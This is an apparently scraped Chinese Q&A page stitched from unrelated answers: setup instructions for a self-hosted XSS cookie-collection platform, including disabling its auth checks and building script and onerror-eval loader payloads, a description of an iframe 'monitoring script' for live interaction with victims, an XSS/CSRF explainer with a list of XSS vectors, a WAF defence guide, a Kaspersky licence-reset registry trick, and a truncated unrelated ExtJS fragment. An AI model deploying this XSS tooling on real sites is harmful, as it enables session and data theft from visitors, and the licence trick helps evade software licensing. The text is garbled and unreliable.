php怎么处理boundary
需要修改的地方比较多,目前已基本可用,还在学习摸索中。。。
1、将xssplatform.sql中的xsser.me/修改为实际使用的URL,如localhost:6666/xss/
或者导入以后,再进入数据库执行语句修改域名为自己的。
UPDATE oc_module SET
code=REPLACE(code,'http://xsser.me','http://yourdomain/xss’)
2、修改themes\default\templates\register.html中的提交按钮的源码为:
[html] view plain copy
行53
input id="btnRegister" type="button" onclick="Register()" value="提交注册" /
修改为
input id="btnRegister" type="submit" value="提交注册" /
3、邀请码的生成
[html] view plain copy
(1)将文件source\user.php第10行和50行的权限控制注释掉
//if($user-userId=0) ShowError('未登录或已超时',$url['login'],'重新登录');
//if($user-adminLevel=0) ShowError('没有操作权限',URL_ROOT.'/index.php?do=useract=invite');
然后访问/index.php?do=useract=invite即可生成验证码
(2)注册个用户test,进入数据库,将该用户的adminLevel修改为1,然后去掉(1)中添加到注释;并在第15行case 'invite':处添加权限控制:
if($user-adminLevel=0) ShowError('没有操作权限',URL_ROOT.'/index.php');
(3)或者开放普通注册权限,修改文件/config.php的第18行
$config['register']='invite'; //normal,正常;invite,只允许邀请注册;close,关闭注册功能
4、删除cookie
[html] view plain copy
修改文件themes\default\templates\project_view.html中的Delete()和MultiDelete()函数,将其中post的URL修改为
'/xss/index.php?do=projectact=delcontentr=',即根据实际的服务器路径,在前面添加'/xss'
5、参考http://zone.wooyun.org/content/4355修改文件source\class\user.class.php
[html] view plain copy
行 74
$this-db-Execute("UPDATE ".$this-tbUser." SET loginTime='".time()."'");
修改为
$this-db-Execute("UPDATE ".$this-tbUser." SET loginTime='".time()."' where id={$row['id']}");
6、去掉xss URL中的time()动态值,缩短xss URL的长度(不知会不会有啥影响);
去掉使用提示中的/textarea'\"
[html] view plain copy
文件source/project.php中的修改:
//$codeurl=URL_ROOT."/{$project[urlKey]}?".time();
$codeurl=URL_ROOT."/{$project[urlKey]}";
//$scriptShow1=StripStr("textarea'"script src=".URL_ROOT."/{$project[urlKey]}?".time()."/script");
$scriptShow1=StripStr("script src=".URL_ROOT."/{$project[urlKey]}/script");
//$code2='var b=document.createElement("script");b.src="'.URL_ROOT."/{$project[urlKey]}?".'"+Math.random();(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);';
//$scriptShow2=StripStr("/textarea'\"img src=# id=xssyou style=display:none onerror=eval(unescape(/".rawurlencode($code2)."/.source));//");
$code2='var b=document.createElement("script");b.src="'.URL_ROOT."/{$project[urlKey]}".'";(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);';
$scriptShow2=StripStr("img src=# id=xssyou style=display:none onerror=eval(unescape(/".rawurlencode($code2)."/.source));//");
7、登录页面,回车登录;加载完页面后,自动将光标定位在user输入框
[html] view plain copy
文件themes/default/templates/login.html的修改:
!-- input type="submit" value="登录" onclick="Login()" --
input type="submit" value="登录" onclick="Login()"
在body的最后添加:
!-- 页面加载完成后,将光标定位到user输入框 --
scriptdocument.getElementById('user').focus();/script
8、修改提示页面跳转时间为500ms
[html] view plain copy
文件themes/default/templates/notice.html:
行11
setTimeout("location.href='{$notice.turnto}'",3000);
修改为
setTimeout("location.href='{$notice.turnto}'",500);
10、创建项目页面,自动将光标置于项目名称处
[html] view plain copy
themes/default/templates/project_create.html
行55,添加
scriptdocument.getElementById('title').focus();/script
11、rewrite规则
[html] view plain copy
在web根目录下建立.htaccess伪静态文件(仅针对Apache)
RewriteEngine On
RewriteRule ^([0-9a-zA-Z]{6})$ /xss/index.php?do=codeurlKey=$1 [L]
RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ /xss/index.php?do=doauth=$1domain=$3 [L]
RewriteRule ^register/(.*?)$ /xss/index.php?do=registerkey=$1 [L]
RewriteRule ^register-validate/(.*?)$ /xss/index.php?do=registeract=validatekey=$1 [L]
xss.js 的proxy怎么用
在有XSS.JS(持久型或非持久型)的网站上嵌入 监控脚本 ,这样的脚本可以动态生成一个iframe,并可控制iframe的location值。 监控脚本 控制iframe加载同域下的其它文档,且DOM安全允许 监控脚本 抓取、修改这些被加载进来的文档里的值(因为它们都在严格同域下)。接着,我们有一个控制端,可以通过这个 监控脚本 与victim进行实时交互与双向通信.
XSS与CSRF有什么区别吗?
XSS是获取信息,不需要提前知道其他用户页面的代码和数据包。CSRF是代替用户完成指定的动作,需要知道其他用户页面的代码和数据包。要完成一次CSRF攻击,受害者必须依次完成两个步骤:
登录受信任网站A,并在本地生成Cookie。
在不登出A的情况下,访问危险网站B。
CSRF的防御
服务端的CSRF方式方法很多样,但总的思想都是一致的,就是在客户端页面增加伪随机数。通过验证码的方法。
by三人行慕课
哪有放XSS跨站脚本工具的第三方工具/
不修改网站程序,使用第三方工具来防范XSS跨站式脚本攻击
网站要怎么防范常见的XSS跨站式脚本攻击呢,我们先从XSS跨站式脚本攻击的原理来说起。
网站遭受XSS跨站式脚本攻击的基本原理
1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。
其攻击过程如下所示:
A给B发送一个恶意构造了Web的URL。
B点击并查看了这个URL。
恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。
具有漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。
A的恶意脚本可以在B的电脑上执行B所持有的权限下的命令。
2反射式漏洞,这种漏洞和本地利用漏洞有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。
其攻击过程如下:
A经常浏览某个网站,此网站为B所拥有。B的站点运行A使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)。
C发现B的站点包含反射性的XSS漏洞。
C编写一个利用漏洞的URL,并将其冒充为来自B的邮件发送给A。
A在登录到B的站点后,浏览C提供的URL。
嵌入到URL中的恶意脚本在A的浏览器中执行,就像它直接来自B的服务器一样。此脚本盗窃敏感信息(授权、信用卡、帐号信息等)然后在A完全不知情的情况下将这些信息发送到C的Web站点。
3存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,骇客将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。
其攻击过程如下:
B拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。
C注意到B的站点具有存储式的XXS漏洞。
C发布一个热点信息,吸引其它用户纷纷阅读。
B或者是任何的其他人如A浏览该信息,其会话cookies或者其它信息将被C盗走。
类型A直接威胁用户个体,而类型B和存储式漏洞所威胁的对象都是企业级Web应用。
网站遭受XSS跨站式脚本攻击的基本方式
1. DOM-based cross-site scripting
页面本身包含一些DOM对象的操作,如果未对输入的参数进行处理,可能会导致执行恶意脚本。如下面一些DOM操作:
document.URL
document.URLUnencoded
document.location (and many of its properties)
document.referrer
window.location (and many of its properties)
举个例子,假如某个脆弱的页面的代码如下:
HTML
TITLEWelcome!/TITLE
Hi
SCRIPT
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
/SCRIPT
BR
Welcome to our system
…
/HTML
攻击者使用如下的URL访问时,则非常危险:
http://www.vulnerable.site/welcome.html?name=scriptalert(document.cookie)/script
试了一下,貌似IE、FireFox等浏览器默认 对scriptalert(document.cookie)/script进行了编码,阻止了脚本的执行。但是对于 DOM操作还是要更加谨慎啊,比如把上面的页面修改一下,安全性就增强了不少:
SCRIPT
var pos=document.URL.indexOf("name=")+5;
var name=document.URL.substring(pos,document.URL.length);
if (name.match(/^[a-zA-Z0-9]$/))
{
document.write(name);
}
else
{
window.alert("Security error");
}
/SCRIPT
2. Reflected cross-site scripting
也被称为None-Persistent cross-site scripting,即,非持久化的XSS攻击,是我们通常所说的,也是最常用,使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL,当 URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接菜能引起。
3. Persistent cross-site scripting
持久化XSS攻击,指的是恶意脚本代码被存储进被攻击的数据库,当其他用户正常浏览网页时,站点从数据库中读取了非法用户存入非法数据,恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。
实施方式
我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX,发现参数XXX原样的出现在了页面源码中:
1. input type="text" class="b5d6-22fa-ecd0-66c6 Seach" name="w" value="XXX" /
OK,可以开始做文章了,我们将XXX替换为:abc"/scriptalert('haha')/scripta href=",返回的HTML代码如下:
1. input type="text" class="22fa-ecd0-66c6-1c52 Seach" name="w" value="abc"/
2. scriptalert('haha')/script!--" /
这样,scriptalert('haha')/script被执行了。这里再举例一些XSS攻击行为:
1. IMG SRC="javascript:alert('XSS');"
2. IMG SRC=javascript:alert('XSS')
3. IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"
4. IMG SRC="jav ascript:alert('XSS');"
5. SCRIPT/XSS SRC="http://example.com/xss.js"/SCRIPT
6. SCRIPTalert("XSS");///SCRIPT
7. iframe src=http://example.com/scriptlet.html
8. INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"
9. BODY BACKGROUND="javascript:alert('XSS')"
10. BODY ONLOAD=alert(document.cookie)
11. BODY onload!#$%()*~+-_.,:;?@[/|"]^`=alert("XSS")
12. IMG DYNSRC="javascript:alert('XSS')"
13. IMG DYNSRC="javascript:alert('XSS')"
14. BR SIZE="{alert('XSS')}"
15. IMG SRC='vbscript:msgbox("XSS")'
16. TABLE BACKGROUND="javascript:alert('XSS')"
17. DIV STYLE="width: expression(alert('XSS'));"
18. DIV STYLE="background-image: url(javascript:alert('XSS'))"
19. STYLE TYPE="text/javascript"alert('XSS');/STYLE
20. STYLE type="text/css"BODY{background:url("javascript:alert('XSS')")}/STYLE
21. ?='SCRIPTalert("XSS")/SCRIPT'?
22. A HREF="javascript:document.location='http://www.example.com/'"XSS/A
23. IMG SRC=javascript:alert('XSS')
24. EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"/EMBED
25. a="get";
26. b="URL(""";
27. c="javascript:";
28. d="alert('XSS');"")";
29. eval(a+b+c+d);
总结一下,要防止XSS跨站式脚本攻击主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些javascript关键字和一些敏感的字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用encode编码。
用ASP或者PHP脚本来实现上面的这些想起来就很麻烦。下面就来介绍下用一个第三方工具IISUTM来处理上面我们说到的问题。
准备工作:先去www.iisutm.com下载最新的IISUTM版本。
根据IISUTM网站防火墙安装及操作手册 中的说明把IISUTM部署到你的服务器上来,这里需要注意的是使用Windows 2003+iis6的服务器,需要开启iis中“以IIS5.0 隔离模式运行 www 服务”选项才能正常使用该软件。
安装完成,通过浏览器访问IISUTM的配置管理界面默认的是http://127.0.0.1:8362,这个是私有地址,只能在该服务器上访问,你需要任何地方都能访问的话,可以在安装的时候IP地址的选项那里填入你服务器的公网IP地址,和你所开放的端口。这样你就可以通过你配置的地址进行访问,或者你可以在iis中直接管理名为IISUTM的站点。
登陆管理界面后点击上面导航栏中的“基本设置”,然后点击左边菜单的“防XSS攻击”链接。
开启该链接里所有的选项,选中之后IISUTM会自动保存配置,下面的“使用不允许的发送序列”是该软件提供的XSS攻击关键字的特征库,你可以根据你网站的情况进行更改(最好不要修改)。
确认以上的配置以后,你可以返回到IISUTM管理界面的首页,这里会列出最近服务器遭受到的攻击以及详细,赶紧去看看你的网站是不是随时有人在进行SQL注入吧,以及哪些攻击被IISUTM处理掉了。
网赚啥方式靠谱
小红象我个人认为还挺靠谱的,不过每个人都有自己能接受的范围,你可以尝试之后再决定继不继续。
激活卡巴斯基
本方适用于卡巴6.0 7.0版本,,,
但是你只要按照本方设置成功了,
【卡巴病毒库就会自动升级到现在的最新版本】,
那么也就实现了你永久免费使用卡巴的愿望,,。
============================================
【如何永久免费使用卡巴斯基杀毒软】,
在平时工作中有很多顾客询问我有没有卡巴斯基(以下简称:卡巴)的KEY(激活码)自己的过期了。又不想花钱购买。在这里我就说一个能永久免费使用卡巴斯基杀毒软件的最安全的方法。
网上虽然有很多能用的KEY,但是不少已被列入黑名单的情况。下面就开始介绍我的方法。
本方法对6.0及7.0卡巴都有效
首先强调:在卡巴提示key过期或无key时可直接执行下面a、b、c 三步。
(a) 进入C:\WINDOWS注册表修改器regedit()删除这三项:
HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\LicStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates
(b) 重启电脑(这样注册表的修改才生效)。
(c) 重启后,卡巴仍会提示key过期,选择“激活”‘安装授权’‘试用版本’就行了。
30天以后卡巴提示key过期,再重复以上步骤就行了。也就是说:只要每隔30天就用这种方法激活试用版本,就可以永久试用了。
这种方法的优点:
1.可以永久免费使用;
2.方法简单;
3.不用到处找key或卡巴免激活版,只要普通卡巴就行;
4.上网找的key容易被列入黑名单,而试用版是决对不会被列入黑名单的。
这种方法的缺点:
每30天一次花1分钟搞定,如果你连这个都觉得麻烦的话阿信就无言了。其实,这种方法也是最经典做法之一,有兴趣的话您试试。
提示:切误下载网上所谓的(卡巴斯基key注册表清除软件)那些软件内基本都有流氓程序或者木马病毒。
http://zhidao.baidu.com/question/470062722.html?fr=im100008
如何获取XSS测试平台邀请码
Ext.create('Ext.grid.Panel',{title:'ActionColumnDemo',store:Ext.data.StoreManager.lookup('employeeStore'),columns:[{text:'FirstName',dataIndex:'firstname'},{text:'LastName',dataIndex:'lastname'},{xtype:'actioncolumn',width:50,items: